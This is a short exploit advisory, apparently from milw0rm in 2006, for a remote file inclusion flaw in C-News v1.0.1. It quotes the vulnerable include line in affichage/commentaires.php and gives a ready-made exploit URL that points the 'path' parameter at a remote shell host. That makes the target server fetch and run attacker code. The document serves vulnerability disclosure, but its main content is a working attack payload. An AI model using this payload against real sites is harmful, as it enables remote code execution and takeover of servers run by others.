#============================================================================================== #C-News <= v1.0.1 (path) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://www.c-news.fr/ # #Version : v1.0.1 # #================================================================================================ #Bug in : affichage/commentaires.php # #Vlu Code : #-------------------------------- # include($path . 'data/config.inc.php'); # # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/affichage/commentaires.php?path=http://SHELLURL.COM? # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd # Special Thx To : SiMooooo ================================================================================================== # milw0rm.com [2006-09-05]